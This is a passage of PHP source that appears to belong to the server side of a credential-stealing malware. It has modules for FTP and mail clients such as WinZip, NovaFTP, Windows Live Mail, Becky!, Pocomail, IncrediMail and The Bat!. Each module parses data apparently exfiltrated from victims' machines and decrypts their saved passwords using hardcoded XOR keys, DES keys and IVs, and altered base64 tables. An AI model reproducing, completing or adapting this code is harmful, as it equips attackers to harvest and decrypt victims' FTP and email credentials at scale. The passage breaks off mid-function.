9142. protected function process_ini_file($file_contents)
9143. {
9144. if (strlen($file_contents) <= 4)
9145. return;
9146.  
9147. $file_contents = UnkTextToAnsi($file_contents);
9148. $parsed_ini = parse_ini($file_contents);
9149.  
9150. foreach ($parsed_ini as $section)
9151. {
9152. if (!is_array($section))
9153. continue;
9154. $host = assign($section["host"]);
9155. $user = assign($section["user"]);
9156. $pass = $this->decrypt(assign($section["pass"]));
9157. $dir = assign($section["remotedir"]);
9158. $port = assign($section["port"]);
9159. $servertype = assign($section["servertype"]);
9160. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $servertype == 'SFTP'), $port, $dir), $user, $pass);
9161. }
9162. }
9163.  
9164. public function import_item($stream, $id)
9165. {
9166. switch ($id)
9167. {
9168. case 0x0000:
9169. $ini_file = $stream->read_str();
9170. $this->process_ini_file($ini_file);
9171. break;
9172. default:
9173. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9174. return false;
9175. }
9176. return true;
9177. }
9178. }
9179.  
9180. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9181. // FastStone Browser
9182.  
9183. class module_fs_browser extends module
9184. {
9185. protected function process_db_file($file_data)
9186. {
9187. if (strlen($file_data) == 0)
9188. return;
9189.  
9190. $lines = parse_lines($file_data);
9191. foreach ($lines as $line)
9192. {
9193. $this->add_ftp($line);
9194. }
9195. }
9196.  
9197. public function import_item($stream, $id)
9198. {
9199. switch ($id)
9200. {
9201. case 0x0000:
9202. $db_file = $stream->read_str();
9203. $this->process_db_file($db_file);
9204. break;
9205. default:
9206. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9207. return false;
9208. }
9209. return true;
9210. }
9211. }
9212.  
9213. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9214. // CoolNovo
9215.  
9216. class module_coolnovo extends module_chrome_base
9217. {
9218. }
9219.  
9220. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9221. // WinZip
9222.  
9223. class module_winzip extends module
9224. {
9225. private $password_pairs = array();
9226. private $ftp_dir;
9227.  
9228. private function read_xml_item($host, $port, $xml_array)
9229. {
9230. $user = assign($xml_array['user']);
9231. $pass = assign($xml_array['winex']);
9232. if ($pass != '')
9233. $pass = assign($this->password_pairs[$pass]);
9234. $this->add_ftp(append_port_dir($host, $port, $this->ftp_dir), $user, $pass);
9235.  
9236. foreach ($xml_array as $value)
9237. {
9238. if (is_array($value))
9239. $this->read_xml_item($host, $port, $value);
9240. }
9241. }
9242.  
9243. private function rec_scan_xml_array($xml_array, $find_dir_mode)
9244. {
9245. foreach ($xml_array as $key=>$value)
9246. {
9247. if (is_array($value))
9248. {
9249. if ($find_dir_mode)
9250. {
9251. if (strpos(strval($key), 'filedisposition') !== false && isset($value['attributes']) && is_array($value['attributes']))
9252. {
9253. $this->ftp_dir = assign($value['attributes']['folder']);
9254. }
9255. }
9256. else
9257. {
9258. if (strpos(strval($key), 'site') !== false && isset($value['attributes']) && is_array($value['attributes']))
9259. {
9260. $host = assign($value['attributes']['server']);
9261. $port = assign($value['attributes']['port']);
9262. $this->read_xml_item($host, $port, $value);
9263. }
9264. }
9265. $this->rec_scan_xml_array($value, $find_dir_mode);
9266. }
9267. }
9268. }
9269.  
9270. private function process_xml($value)
9271. {
9272. if (!strlen($value))
9273. return;
9274.  
9275. $xml_parser = new XMLParser($value);
9276. $parsed_xml = $xml_parser->parse();
9277. if (!$xml_parser->isError || is_array($parsed_xml))
9278. {
9279. $this->ftp_dir = '';
9280. $this->rec_scan_xml_array($parsed_xml, true); // find directory
9281. $this->rec_scan_xml_array($parsed_xml, false); // process ftp record
9282. } else
9283. {
9284. $this->log->add("ERR_XML_PARSE");
9285. }
9286. }
9287.  
9288. public function import_item($stream, $id)
9289. {
9290. switch ($id)
9291. {
9292. case 0x0000:
9293. $host = $stream->read_str();
9294. $user = $stream->read_str();
9295. $pass = $stream->read_str();
9296. $port = $stream->read_str();
9297. $dir = $stream->read_str();
9298. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
9299. break;
9300. case 0x0001:
9301. $encrypted_pass = $stream->read_str();
9302. $decrypted_pass = $stream->read_str();
9303. $decrypted_pass = ztrim(unicode_to_ansi($decrypted_pass));
9304. $this->password_pairs[$encrypted_pass] = $decrypted_pass;
9305. break;
9306. case 0x0002:
9307. $xml_file = $stream->read_str();
9308. $this->process_xml($xml_file);
9309. break;
9310. default:
9311. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9312. return false;
9313. }
9314. return true;
9315. }
9316. }
9317.  
9318. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9319. // Yandex.Internet
9320.  
9321. class module_yandexinternet extends module_chrome_base
9322. {
9323. }
9324.  
9325. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9326. // MyFTP
9327.  
9328. class module_myftp extends module
9329. {
9330. private function decrypt($encrypted_password)
9331. {
9332. $decrypted_password = '';
9333. $xor_array = array(0x85 ^ 0x31, 0x85 ^ 0x31, 0x83 ^ 0x31, 0x81 ^ 0x31);
9334. for ($i = 0; $i < strlen($encrypted_password); $i++)
9335. {
9336. $decrypted_password .= chr(ord($encrypted_password[$i]) ^ $xor_array[$i%sizeof($xor_array)]);
9337. }
9338. return $decrypted_password;
9339. }
9340.  
9341. protected function process_ini_file($file_contents)
9342. {
9343. if (strlen($file_contents) <= 4)
9344. return;
9345.  
9346. $parsed_ini = parse_ini($file_contents);
9347. foreach ($parsed_ini as $section)
9348. {
9349. if (!is_array($section))
9350. continue;
9351. $host = assign($section['remote hostname']);
9352. $user = assign($section['remote username']);
9353. $pass = $this->decrypt(assign($section['remote password']));
9354. $port = assign($section['remote port']);
9355. $dir = assign($section['remote path']);
9356. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
9357. }
9358. }
9359.  
9360. public function import_item($stream, $id)
9361. {
9362. switch ($id)
9363. {
9364. case 0x0000:
9365. $ini_contents = $stream->read_str();
9366. $this->process_ini_file($ini_contents);
9367. break;
9368. default:
9369. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9370. return false;
9371. }
9372. return true;
9373. }
9374. }
9375.  
9376. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9377. // sherrod FTP
9378.  
9379. class module_sherrodftp extends module
9380. {
9381. private function decrypt($encrypted_password)
9382. {
9383. $encrypted_password = trim($encrypted_password);
9384. if (!strlen($encrypted_password))
9385. return '';
9386.  
9387. $crypt_key = base64_decode('Zz1o//1yM0o=');
9388. $crypt_iv = base64_decode('QAroHxawL5k=');
9389. $decoded_password = base64_decode($encrypted_password);
9390. if (!strlen($decoded_password))
9391. {
9392. $this->log->add('ERR_INVALID_BASE64_STRING');
9393. return '';
9394. }
9395.  
9396. $plain_text = mcrypt_decrypt(MCRYPT_DES, $crypt_key, $decoded_password, MCRYPT_MODE_CBC, $crypt_iv);
9397.  
9398. $decrypted_password = '';
9399. if (strlen($plain_text))
9400. {
9401. $char = $plain_text[strlen($plain_text)-1];
9402. while (strlen($plain_text) && ($plain_text[strlen($plain_text)-1] == $char))
9403. $plain_text = substr($plain_text, 0, -1);
9404. $decrypted_password = $plain_text;
9405. }
9406. return $decrypted_password;
9407. }
9408.  
9409. private function read_xml_item($xml_array)
9410. {
9411. $host = Utf8ToWin(assign($xml_array['Host']));
9412. $user = Utf8ToWin(assign($xml_array['User']));
9413. if (!strlen($user))
9414. $user = Utf8ToWin(assign($xml_array['UserName']));
9415. $pass = Utf8ToWin($this->decrypt(assign($xml_array['Password'])));
9416. $port = Utf8ToWin(assign($xml_array['Port']));
9417. $dir = Utf8ToWin(assign($xml_array['RemoteDirectory']));
9418. $proto = Utf8ToWin(assign($xml_array['Protocol']));
9419.  
9420. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto == 'SFTP'), $port, $dir), $user, $pass);
9421.  
9422. foreach ($xml_array as $value)
9423. {
9424. if (is_array($value))
9425. $this->read_xml_item($value);
9426. }
9427. }
9428.  
9429. private function rec_scan_xml_array($xml_array)
9430. {
9431. foreach ($xml_array as $key=>$value)
9432. {
9433. if (is_array($value))
9434. {
9435. if (strpos(strval($key), 'HistoryItem') !== false ||
9436. strpos(strval($key), 'FavoriteSettings') !== false)
9437. {
9438. $this->read_xml_item($value);
9439. }
9440. $this->rec_scan_xml_array($value);
9441. }
9442. }
9443. }
9444.  
9445. private function process_xml($value)
9446. {
9447. if (!strlen($value))
9448. return;
9449.  
9450. $value = CutXMLEncoding($value);
9451. $xml_parser = new XMLParser($value);
9452. $parsed_xml = $xml_parser->parse();
9453. if (!$xml_parser->isError || is_array($parsed_xml))
9454. {
9455. $this->rec_scan_xml_array($parsed_xml);
9456. } else
9457. {
9458. $this->log->add("ERR_XML_PARSE");
9459. }
9460. }
9461.  
9462. public function import_item($stream, $id)
9463. {
9464. switch ($id)
9465. {
9466. case 0x0000:
9467. $xml_file = $stream->read_str();
9468. $this->process_xml($xml_file);
9469. break;
9470. default:
9471. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9472. return false;
9473. }
9474. return true;
9475. }
9476. }
9477.  
9478. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9479. // NovaFTP
9480.  
9481. class module_novaftp extends module
9482. {
9483. private function decrypt($encrypted_password)
9484. {
9485. $encrypted_password = trim($encrypted_password);
9486. if (!strlen($encrypted_password))
9487. return '';
9488.  
9489. $decoded_password = base64_decode($encrypted_password);
9490. if (!strlen($decoded_password))
9491. {
9492. $this->log->add('ERR_INVALID_BASE64_STRING');
9493. return '';
9494. }
9495.  
9496. $xor_str = 's235280i113755-381ds22';
9497.  
9498. $decrypted_password = '';
9499.  
9500. for ($i = 0; $i < strlen($decoded_password); $i++)
9501. {
9502. $decrypted_password .= chr(ord($decoded_password[$i]) ^ ord($xor_str[$i % strlen($xor_str)]));
9503. }
9504.  
9505. return $decrypted_password;
9506. }
9507.  
9508. protected function process_sqlite_file($file_contents)
9509. {
9510. if (strlen($file_contents) == 0)
9511. return;
9512.  
9513. global $global_temporary_directory;
9514.  
9515. if (!class_exists('SQLite3') && !class_exists('PDO'))
9516. {
9517. $this->log->add("NOTIFY_PDO_AND_SQLITE3_CLASSES_DO_NOT_EXIST");
9518. return;
9519. }
9520.  
9521. $tmp_name = tempnam($global_temporary_directory, 'sqlite');
9522.  
9523. if (!is_writable($global_temporary_directory))
9524. {
9525. $this->log->add("ERR_CANNOT_ACCESS_SQLITE_DB_FILE");
9526. return;
9527. }
9528.  
9529. $fp = fopen($tmp_name, "wb");
9530. if (!$fp)
9531. {
9532. $this->log->add("ERR_CANNOT_ACCESS_SQLITE_DB_FILE");
9533. return;
9534. }
9535.  
9536. if (fwrite($fp, $file_contents) != strlen($file_contents))
9537. {
9538. fclose($fp);
9539. unlink($tmp_name);
9540. $this->log->add("ERR_CANNOT_WRITE_SQLITE_DB_FILE");
9541. return;
9542. }
9543.  
9544. fclose($fp);
9545.  
9546. if (class_exists('SQLite3'))
9547. {
9548. // use SQLite3 php-extension
9549. try
9550. {
9551. $database = new SQLite3($tmp_name, SQLITE3_OPEN_READONLY);
9552. if (!$database)
9553. {
9554. $this->log->add("ERR_CANNOT_OPEN_SQLITE_DB");
9555. } else
9556. {
9557. try
9558. {
9559. $results = $database->query('SELECT * FROM "bmk_ftp"');
9560. if ($results)
9561. {
9562. while ($row = $results->fetchArray())
9563. {
9564. $host = assign($row['host_name']);
9565.  
9566. $user = assign($row['user_name']);
9567. $pass = assign($row['user_pass']);
9568. $pass = $this->decrypt($pass);
9569. $port = assign($row['host_port']);
9570. $dir = assign($row['host_start_directory']);
9571.  
9572. $host = Utf8ToWin($host);
9573. $user = Utf8ToWin($user);
9574. $pass = Utf8ToWin($pass);
9575. $dir = Utf8ToWin($dir);
9576.  
9577. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
9578. }
9579. }
9580. }
9581. catch(Exception $e)
9582. {
9583. }
9584.  
9585. $database->close();
9586. unset($database);
9587. }
9588. }
9589. catch (Exception $e)
9590. {
9591. if (isset($database))
9592. {
9593. @$database->close();
9594. unset($database);
9595. }
9596. $this->log->add("ERR_SQLITE_EXCEPTION: $e");
9597. }
9598. } else if (class_exists('PDO'))
9599. {
9600. // use PDO driver
9601. $drivers = PDO::getAvailableDrivers();
9602. $driver_available = array_search('sqlite', $drivers) !== false;
9603.  
9604. if ($driver_available)
9605. {
9606. try
9607. {
9608. /*** create the database file in /tmp ***/
9609. $dbh = new PDO("sqlite:$tmp_name");
9610.  
9611. if (!$dbh)
9612. $this->log->add("ERR_CANNOT_OPEN_PDO_SQLITE_DB");
9613. else
9614. {
9615. /*** set all errors to exceptions ***/
9616. $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
9617.  
9618. try
9619. {
9620. $sql = 'SELECT * FROM "bmk_ftp"';
9621. foreach ($dbh->query($sql) as $row)
9622. {
9623. $host = assign($row['host_name']);
9624.  
9625. $user = assign($row['user_name']);
9626. $pass = assign($row['user_pass']);
9627. $pass = $this->decrypt($pass);
9628. $port = assign($row['host_port']);
9629. $dir = assign($row['host_start_directory']);
9630.  
9631. $host = Utf8ToWin($host);
9632. $user = Utf8ToWin($user);
9633. $pass = Utf8ToWin($pass);
9634. $dir = Utf8ToWin($dir);
9635.  
9636. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
9637. }
9638. }
9639. catch(Exception $e)
9640. {
9641. }
9642.  
9643. unset($dbh);
9644. }
9645. }
9646. catch (Exception $e)
9647. {
9648. if (isset($dbh))
9649. {
9650. unset($dbh);
9651. }
9652. $this->log->add("ERR_PDO_EXCEPTION: $e");
9653. }
9654. }
9655. }
9656. unlink($tmp_name);
9657. }
9658.  
9659. public function import_item($stream, $id)
9660. {
9661. switch ($id)
9662. {
9663. case 0x0000:
9664. $db_file = $stream->read_str();
9665. $this->process_sqlite_file($db_file);
9666. break;
9667. default:
9668. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9669. return false;
9670. }
9671. return true;
9672. }
9673. }
9674.  
9675. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9676. // Windows Mail Base Class
9677.  
9678. class module_windows_mail_base extends module
9679. {
9680. private $password_pairs = array();
9681.  
9682. private function read_record_data($xml_array, $name, $xml_tag)
9683. {
9684. $data = assign($xml_array[$name.'_'.$xml_tag]);
9685. if (is_array($data))
9686. return Utf8ToWin(assign($data['value']));
9687. else
9688. return '';
9689. }
9690.  
9691. private function read_record($xml_array, $name, $protocol)
9692. {
9693. $host = $this->read_record_data($xml_array, $name, 'Server');
9694. $user = $this->read_record_data($xml_array, $name, 'User_Name');
9695. $pass = assign($this->password_pairs[$this->read_record_data($xml_array, $name, 'Password2')]);
9696. $port = intval(hexdec($this->read_record_data($xml_array, $name, 'Port')));
9697. $email = $this->read_record_data($xml_array, 'SMTP', 'Email_Address');
9698. $sicily = $this->read_record_data($xml_array, 'SMTP', 'Use_Sicily');
9699.  
9700. $this->add_email($email, $protocol, $host, $port, $user, $pass);
9701.  
9702. if ($protocol == 'smtp' && $sicily == '00000002')
9703. {
9704. // Copy auth settings from POP3
9705. $user = $this->read_record_data($xml_array, 'POP3', 'User_Name');
9706. $pass = assign($this->password_pairs[$this->read_record_data($xml_array, 'POP3', 'Password2')]);
9707. $this->add_email($email, $protocol, $host, $port, $user, $pass);
9708.  
9709. // Copy auth settings from IMAP
9710. $user = $this->read_record_data($xml_array, 'IMAP', 'User_Name');
9711. $pass = assign($this->password_pairs[$this->read_record_data($xml_array, 'IMAP', 'Password2')]);
9712. $this->add_email($email, $protocol, $host, $port, $user, $pass);
9713. }
9714. }
9715.  
9716. private function read_xml_item($xml_array)
9717. {
9718. $this->read_record($xml_array, 'POP3', 'pop3');
9719. $this->read_record($xml_array, 'SMTP', 'smtp');
9720. $this->read_record($xml_array, 'IMAP', 'imap');
9721. $this->read_record($xml_array, 'HTTPMail', 'http');
9722.  
9723. foreach ($xml_array as $value)
9724. {
9725. if (is_array($value))
9726. $this->read_xml_item($value);
9727. }
9728. }
9729.  
9730. private function rec_scan_xml_array($xml_array)
9731. {
9732. foreach ($xml_array as $key=>$value)
9733. {
9734. if (is_array($value))
9735. {
9736. if (strpos(strval($key), 'MessageAccount') !== false)
9737. {
9738. $this->read_xml_item($value);
9739. }
9740. $this->rec_scan_xml_array($value);
9741. }
9742. }
9743. }
9744.  
9745. private function process_xml($value)
9746. {
9747. if (!strlen($value))
9748. return;
9749.  
9750. $value = CutXMLEncoding($value);
9751. $xml_parser = new XMLParser($value);
9752.  
9753. $parsed_xml = $xml_parser->parse();
9754. if (!$xml_parser->isError || is_array($parsed_xml))
9755. {
9756. $this->rec_scan_xml_array($parsed_xml);
9757. } else
9758. {
9759. $this->log->add("ERR_XML_PARSE");
9760. }
9761. }
9762.  
9763. public function import_item($stream, $id)
9764. {
9765. switch ($id)
9766. {
9767. case 0x0001:
9768. $encrypted_pass = $stream->read_str();
9769. $decrypted_pass = ztrim(unicode_to_ansi($stream->read_str()));
9770. $this->password_pairs[$encrypted_pass] = $decrypted_pass;
9771. break;
9772. case 0x0002:
9773. $xml_file = $stream->read_str();
9774. $this->process_xml($xml_file);
9775. break;
9776. default:
9777. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9778. return false;
9779. }
9780. return true;
9781. }
9782. }
9783.  
9784. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9785. // Windows Mail
9786.  
9787. class module_windows_mail extends module_windows_mail_base
9788. {
9789. }
9790.  
9791. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9792. // Windows Live Mail
9793.  
9794. class module_windows_live_mail extends module_windows_mail_base
9795. {
9796. }
9797.  
9798. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9799. // Becky!
9800.  
9801. class module_becky extends module
9802. {
9803. private function decrypt($encrypted_password)
9804. {
9805. $decrypted_password = '';
9806. for ($i = 0; $i < strlen($encrypted_password); $i++)
9807. {
9808. $decrypted_password .= chr(ord($encrypted_password[$i]) ^ 2);
9809. }
9810. return base64_decode(base64_decode($decrypted_password));
9811. }
9812.  
9813. protected function process_ini_file($file_contents)
9814. {
9815. if (strlen($file_contents) <= 4)
9816. return;
9817.  
9818. $parsed_ini = parse_ini($file_contents);
9819. foreach ($parsed_ini as $section)
9820. {
9821. if (!is_array($section))
9822. continue;
9823.  
9824. $mail_server = assign($section['mailserver']);
9825. $smtp_server = assign($section['smtpserver']);
9826. $smtp_port = assign($section['smtpport']);
9827. $user = assign($section['userid']);
9828. $pass = $this->decrypt(assign($section['passwd']));
9829. $email = assign($section['mailaddress']);
9830. $protocol = assign($section['protocol']);
9831.  
9832. if ($protocol == '1')
9833. {
9834. $mail_port = assign($section['imap4port']);
9835. $protocol = 'imap';
9836. } else
9837. {
9838. $mail_port = assign($section['pop3port']);
9839. $protocol = 'pop3';
9840. }
9841. // imap/pop3
9842. $this->add_email($email, $protocol, $mail_server, $mail_port, $user, $pass);
9843. // smtp
9844. $this->add_email($email, 'smtp', $smtp_server, $smtp_port, $user, $pass);
9845. }
9846. }
9847.  
9848. public function import_item($stream, $id)
9849. {
9850. switch ($id)
9851. {
9852. case 0x0000:
9853. $ini_contents = $stream->read_str();
9854. $this->process_ini_file($ini_contents);
9855. break;
9856. default:
9857. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9858. return false;
9859. }
9860. return true;
9861. }
9862. }
9863.  
9864.  
9865. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9866. // Pocomail
9867.  
9868. class module_pocomail extends module
9869. {
9870. private function decrypt($encrypted_password)
9871. {
9872. $encrypted_password = trim($encrypted_password);
9873. if (!strlen($encrypted_password))
9874. return '';
9875.  
9876. $decoded_password = hextostr($encrypted_password);
9877. $decrypted_password = '';
9878.  
9879. $seed = 0x2A9A;
9880. for ($i = 0; $i < strlen($decoded_password); $i++)
9881. {
9882. $decrypted_password .= chr(ord($decoded_password[$i]) ^ (($seed >> 8) & 0xff));
9883. $seed += ord($decoded_password[$i]);
9884. $seed = hexdec(gmp_strval(gmp_and(gmp_add(gmp_mul("$seed", "0x8141"), "0x3171"), "0xffff"), 16));
9885. }
9886. return $decrypted_password;
9887. }
9888.  
9889. protected function process_ini_file($file_contents)
9890. {
9891. if (strlen($file_contents) <= 4)
9892. return;
9893.  
9894. $parsed_ini = parse_ini($file_contents);
9895. foreach ($parsed_ini as $section)
9896. {
9897. if (!is_array($section))
9898. continue;
9899.  
9900. $email = assign($section['email']);
9901. $pop3_server = assign($section['popserver']);
9902. $pop3_pass = $this->decrypt(assign($section['poppass']));
9903. $pop3_user = assign($section['popuser']);
9904.  
9905. $smtp_server = assign($section['smtp']);
9906. $smtp_user = assign($section['smtpuser']);
9907. $smtp_pass = $this->decrypt(assign($section['smtppass']));
9908.  
9909. if (assign($section['imap']) == '1')
9910. $protocol = 'imap';
9911. else
9912. $protocol = 'pop3';
9913.  
9914. // pop3/imap
9915. $this->add_email($email, $protocol, $pop3_server, '', $pop3_user, $pop3_pass);
9916. // smtp
9917. $this->add_email($email, 'smtp', $smtp_server, '', $smtp_user, $smtp_pass);
9918. }
9919. }
9920.  
9921. public function import_item($stream, $id)
9922. {
9923. switch ($id)
9924. {
9925. case 0x0000:
9926. $ini_contents = $stream->read_str();
9927. $this->process_ini_file($ini_contents);
9928. break;
9929. default:
9930. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
9931. return false;
9932. }
9933. return true;
9934. }
9935. }
9936.  
9937. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
9938. // IncrediMail
9939.  
9940. class module_incredimail extends module
9941. {
9942. private function decrypt($encrypted_password)
9943. {
9944. $xor_str = chr(0xb9).chr(0x02).chr(0xfa).chr(0x01);
9945.  
9946. $decrypted_password = '';
9947.  
9948. for ($i = 0; $i < strlen($encrypted_password); $i++)
9949. {
9950. $decrypted_password .= chr(ord($encrypted_password[$i]) ^ ord($xor_str[$i % strlen($xor_str)]));
9951. }
9952.  
9953. return $decrypted_password;
9954. }
9955.  
9956. public function import_item($stream, $id)
9957. {
9958. switch ($id)
9959. {
9960. case 0x0000:
9961. $email = $stream->read_str();
9962. $protocol = $stream->read_str();
9963.  
9964. $pop3_server = $stream->read_str();
9965. $pop3_port = $stream->read_str();
9966. if (strlen($pop3_port) == 4)
9967. {
9968. $pop3_port = data_int32($pop3_port);
9969. } else
9970. {
9971. $pop3_port = 0;
9972. }
9973. $pop3_user = $stream->read_str();
9974. $pop3_pass = $this->decrypt($stream->read_str());
9975.  
9976. $smtp_server = $stream->read_str();
9977. $smtp_port = $stream->read_str();
9978. if (strlen($smtp_port) == 4)
9979. {
9980. $smtp_port = data_int32($smtp_port);
9981. } else
9982. {
9983. $smtp_port = 0;
9984. }
9985. $smtp_user = $stream->read_str();
9986. $smtp_pass = $this->decrypt($stream->read_str());
9987.  
9988. if ($protocol == 'IMAP')
9989. $protocol = 'imap';
9990. else
9991. $protocol = 'pop3';
9992.  
9993. // pop3/imap
9994. $this->add_email($email, $protocol, $pop3_server, $pop3_port, $pop3_user, $pop3_pass);
9995. // smtp
9996. $this->add_email($email, 'smtp', $smtp_server, $smtp_port, $smtp_user, $smtp_pass);
9997.  
9998. break;
9999. default:
10000. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
10001. return false;
10002. }
10003. return true;
10004. }
10005. }
10006.  
10007. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
10008. // The Bat!
10009.  
10010. class stream_thebat extends stream
10011. {
10012. public function read_tb_data($index_num, $data_offset, $length)
10013. {
10014. if (!$this->state)
10015. return false;
10016.  
10017. $index_len = $index_num*13 + 8;
10018. $original_pos = $this->pos;
10019. $this->seek($index_len+$data_offset+4);
10020. $data = $this->read_strlen($length);
10021. $this->seek($original_pos);
10022.  
10023. if (!$this->state)
10024. return false;
10025.  
10026. return $data;
10027. }
10028. }
10029.  
10030. class module_thebat extends module
10031. {
10032. private function decrypt($encrypted_password)
10033. {
10034. $encrypted_password = trim($encrypted_password);
10035. if (!strlen($encrypted_password))
10036. return '';
10037.  
10038. $tb_b64 = '+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
10039. $real_b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
10040.  
10041. // The Bat! uses modified base64 table, translate to normal one
10042. for ($i = 0; $i < strlen($encrypted_password); $i++)
10043. {
10044. $tb_pos = strpos($tb_b64, $encrypted_password[$i]);
10045. if ($tb_pos === false)
10046. {
10047. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
10048. return '';
10049. }
10050. $encrypted_password[$i] = $real_b64[$tb_pos];
10051. }
10052.  
10053. $decoded_password = base64_decode($encrypted_password, true);
10054. if (!strlen($decoded_password))
10055. {
10056. $this->log->add('ERR_INVALID_BASE64_STRING');
10057. return '';
10058. }
10059.  
10060. if (strlen($decoded_password) < 4)
10061. {
10062. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
10063. return '';
10064. }
10065.  
10066. // decode password length
10067. for ($i = 0; $i < 4; $i++)
10068. {
10069. $decoded_password[$i] = chr(0xff-ord($decoded_password[$i]));
10070. }
10071.  
10072. $pass_len = data_int32(substr($decoded_password, 0, 4));
10073. $decoded_password = substr($decoded_password, 4);
10074. $decrypted_password = '';
10075.  
10076. for ($i = 0; $i < strlen($decoded_password); $i++)
10077. {
10078. $decrypted_password .= chr(ord($decoded_password[$i]) ^ 0x5a);
10079. }
10080.  
10081. $decrypted_password = substr($decrypted_password, 0, $pass_len);
10082.  
10083. return strrev($decrypted_password);
10084. }
10085.  
10086. protected function process_cfn($cfn_file)
10087. {
10088. if (strlen($cfn_file) < 4)
10089. return;
10090.  
10091. $stream = new stream_thebat($cfn_file, $this->log);
10092. $index_num = $stream->read_dword();
10093. if (!$index_num)
10094. return;
10095.  
10096. if (!$stream->state)
10097. return;
10098.  
10099. $email = '';
10100. $server = '';
10101. $user = '';
10102. $pass = '';
10103. $smtp_server = '';
10104. $smtp_port = '';
10105. $pop3_port = '';
10106. $imap_port = '';
10107. $smtp_user = '';
10108. $smtp_pass = '';
10109. $protocol = 0;
10110.  
10111. for ($i = 0; $i < $index_num; $i++)
10112. {
10113. $flag = $stream->read_byte();
10114. $seq = $stream->read_dword();
10115. $offs = $stream->read_dword();
10116. $len = $stream->read_dword();
10117.  
10118. if ($flag == 0)
10119. {
10120. switch ($seq)
10121. {
10122. case 0x00008159:
10123. $email = $stream->read_tb_data($index_num, $offs, $len);
10124. break;
10125. case 0x00008179:
10126. $server = $stream->read_tb_data($index_num, $offs, $len);
10127. break;
10128. case 0x000081A7:
10129. $user = $this->decrypt($stream->read_tb_data($index_num, $offs, $len));
10130. break;
10131. case 0x000081A6:
10132. $pass = $this->decrypt($stream->read_tb_data($index_num, $offs, $len));
10133. break;
10134. case 0x0000819e:
10135. $smtp_server = $stream->read_tb_data($index_num, $offs, $len);
10136. break;
10137. case 0x00008194:
10138. $smtp_pass = $stream->read_tb_data($index_num, $offs, $len);
10139. break;
10140. case 0x00008195:
10141. $smtp_user = $stream->read_tb_data($index_num, $offs, $len);
10142. break;
10143. case 0x000081bd:
10144. $smtp_pass = $this->decrypt($stream->read_tb_data($index_num, $offs, $len));
10145. break;
10146. }
